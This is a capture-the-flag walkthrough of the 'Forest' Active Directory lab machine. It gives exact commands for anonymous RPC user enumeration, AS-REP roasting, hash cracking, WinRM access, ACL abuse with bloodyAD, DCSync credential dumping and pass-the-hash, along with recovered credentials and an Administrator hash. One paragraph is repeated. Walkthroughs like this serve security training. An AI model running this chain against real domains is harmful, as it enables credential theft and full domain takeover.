Overview
Forest is a beginner-friendly Active Directory machine that focuses on domain enumeration, Kerberos abuse, BloodHound privilege analysis, and ACL exploitation.
The machine demonstrates how a low-privileged domain account can eventually lead to full Domain Administrator compromise through delegated Active Directory permissions.
Attack Path Summary
Anonymous RPC Enumeration
↓
User Discovery
↓
AS-REP Roasting
↓
Hash Cracking
↓
WinRM Access
↓
BloodHound Analysis
↓
ACL Abuse
↓
DCSync
↓
Domain Administrator
Reconnaissance
Nmap Scan
Initial service enumeration:
nmap -sVC -Pn 10.129.37.0
Results:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open http
The exposed services strongly suggested that the target was functioning as a Domain Controller.
Important observations:
- Kerberos exposed
- LDAP available
- SMB accessible
- WinRM enabled
Service Enumeration
Anonymous RPC enumeration was allowed on the target system.
Using rpcclient, domain users could be enumerated without authentication.
Vulnerability Identification
The environment exposed several common Active Directory attack surfaces:
- Anonymous RPC access
- Kerberos accounts vulnerable to AS-REP Roasting
- Excessive delegated ACL permissions
- WinRM access for remote management
Initial Foothold
RPC Enumeration
Using rpcclient:
rpcclient -U "" -N 10.129.37.0
Enumerating users:
enumdomusers
Interesting accounts discovered:
sebastien
lucinda
svc-alfresco
andy
mark
santi
Among the enumerated users, svc-alfresco appeared to be a service account and became the primary target for further investigation.
AS-REP Roasting
AS-REP Roasting is a Kerberos attack technique that targets accounts with Kerberos pre-authentication disabled.
Attackers can request encrypted authentication material directly from the Domain Controller without valid credentials and attempt offline password cracking.
Using Impacket:
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.37.0
Successful output:
$krb5asrep$23$svc-alfresco@HTB.LOCAL:...
The account was confirmed to be vulnerable to AS-REP Roasting.
Cracking the Hash
Using Hashcat:
hashcat -m 18200 svc-alfresco.hash /usr/share/wordlists/rockyou.txt
Recovered credentials:
svc-alfresco:s3rvice
WinRM Access
Using the recovered credentials, remote shell access was obtained through WinRM:
evil-winrm -u svc-alfresco -p 's3rvice' -i 10.129.37.0
Successful authentication granted PowerShell access to the target system.
Privilege Escalation
BloodHound Enumeration

After obtaining an initial foothold, internal Active Directory enumeration was performed using SharpHound.
BloodHound analysis revealed the following privilege chain:
Account Operators
↓ GenericAll
Exchange Windows Permissions
↓ WriteDacl
HTB.LOCAL Domain Object
The compromised svc-alfresco account was a member of Account Operators, which possessed GenericAll permissions over the Exchange Windows Permissions group.
The Exchange Windows Permissions group had WriteDacl rights over the domain object, making it possible to grant DCSync privileges to svc-alfresco.
The compromised svc-alfresco account was a member of Account Operators, which possessed GenericAll permissions over the Exchange Windows Permissions group.
The Exchange Windows Permissions group had WriteDacl rights over the domain object, making it possible to grant DCSync privileges to svc-alfresco.
ACL Abuse
Adding svc-alfresco to the Exchange Windows Permissions group:
bloodyAD --host 10.129.37.0 \
-d htb.local \
-u svc-alfresco \
-p 's3rvice' \
add groupMember "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco"
Granting DCSync privileges:
bloodyAD --host 10.129.37.0 \
-d htb.local \
-u svc-alfresco \
-p 's3rvice' \
add dcsync svc-alfresco
DCSync Attack
Using Impacket:
impacket-secretsdump htb.local/svc-alfresco:'s3rvice'@10.129.37.0
Administrator NTLM hash:
Administrator:32693b11e6aa90eb43d32c72a07ceea6
Administrator Access
Using Pass-the-Hash authentication:
evil-winrm -i 10.129.37.0 \
-u Administrator \
-H 32693b11e6aa90eb43d32c72a07ceea6
Successful authentication resulted in Domain Administrator access.
Skills & Concepts
- Active Directory Enumeration
- RPC Enumeration
- Kerberos Abuse
- AS-REP Roasting
- BloodHound Analysis
- ACL Abuse
- DCSync
- Pass-the-Hash
- Active Directory Privilege Escalation
Tools Used
- Nmap
- rpcclient
- Impacket
- Hashcat
- Evil-WinRM
- BloodHound
- SharpHound
- BloodyAD
Lessons Learned
Forest is an excellent introductory Active Directory machine because it demonstrates several core AD attack concepts in a realistic attack chain:
- Anonymous domain enumeration
- Kerberos abuse through AS-REP Roasting
- Internal privilege mapping with BloodHound
- ACL-based privilege escalation
- DCSync attacks
- Pass-the-Hash authentication
The machine also highlights the dangers of excessive delegated permissions and insecure Active Directory configurations inside enterprise environments.